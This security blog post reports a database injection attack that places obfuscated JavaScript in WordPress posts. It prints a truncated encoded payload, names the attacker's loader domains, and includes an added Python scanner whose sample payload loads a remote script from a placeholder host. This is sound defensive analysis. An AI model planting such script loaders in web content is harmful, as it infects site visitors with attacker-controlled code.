
Sucuri Blog

Website Security News


Database injection, lessthenaminutehandle.com and more updates

April 1, 2011 | David Dede


We posted a few weeks ago about a large-scale database injection attack affecting WordPress sites on shared hosts. The infected sites had the following JavaScript malware inserted into every post in their database (generally the wp_posts table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Once decoded, it attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

We also saw multiple variations of it, where the following domains were used as the main intermediaries:

http://lessthenaseconddeal.com/ll.php?k=09
globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

What is interesting is the number of sub-intermediaries that change every few hours:


They are using domains on multiple TLDs (.net, .com, .in, .us, etc.) that change every hour. The networks most commonly hosting them are 65.23.153.0/24 and 46.252.130.0/24, but that changes often as well. We will keep you posted as we track them…
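Because the intermediary domains rotate so quickly, it is more reliable to search post content for the eval(unescape("%..")) wrapper itself and decode it than to match on domain names. The following is an added example, not code from Sucuri or from the original post: it assumes rows of (ID, post_content) exported from wp_posts, all function names are hypothetical, and the sample rows are constructed with the placeholder domain malicious.example.

```python
import re
from urllib.parse import unquote, urlparse

# Injection shape shown in the post: eval(unescape("%64%6F...")), all %XX escapes.
INJECTION_RE = re.compile(
    r"""eval\s*\(\s*unescape\s*\(\s*(["'])((?:%[0-9A-Fa-f]{2}){8,})\1""", re.I)
# src= attributes (quoted or bare) inside the decoded payload.
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?([^"'\s>\\]+)""", re.I)

def decode_injections(content):
    """Decoded JavaScript of every eval(unescape("...")) found in content."""
    # latin-1 mirrors JavaScript unescape(): %XX becomes code point 0xXX.
    return [unquote(m.group(2), encoding="latin-1")
            for m in INJECTION_RE.finditer(content)]

def loaded_hosts(decoded_js):
    """Hostnames the decoded payload tries to load scripts from."""
    hosts = set()
    for src in SRC_RE.findall(decoded_js):
        # Treat scheme-less values (host/js.php) as network locations.
        host = urlparse(src if "//" in src else "//" + src).hostname
        if host:
            hosts.add(host)
    return hosts

def scan_posts(rows):
    """rows: iterable of (post_id, post_content). Returns {post_id: [hosts]}."""
    report = {}
    for post_id, content in rows:
        decoded = decode_injections(content)
        if decoded:
            report[post_id] = sorted(set().union(*map(loaded_hosts, decoded)))
    return report

def encode_sample(js):
    """Percent-encode every byte; used only to build the constructed sample."""
    return "".join("%%%02X" % b for b in js.encode("latin-1"))

# Constructed sample rows; malicious.example is a placeholder domain.
SAMPLE_PAYLOAD = ("document.write('<script src=\"http://malicious.example/"
                  "js.php?kk=33\"></script>');")
SAMPLE_ROWS = [
    (1, "<p>Clean post.</p>"),
    (2, '<p>Hi</p><script>eval(unescape("%s"))</script>' % encode_sample(SAMPLE_PAYLOAD)),
    (3, "<p>Mentions eval(unescape(...)) without a payload.</p>"),
]

if __name__ == "__main__":
    print(scan_posts(SAMPLE_ROWS))
```

Any post ID in the report contains the wrapper and needs cleaning; the host list shows which intermediary that particular variation points to.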

If you are worried your site might be vulnerable, scan it here: http://sitecheck.sucuri.net



Categories: Website Malware Infections
Tags: Hacked Websites, Malware Updates, Website Blacklist

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.
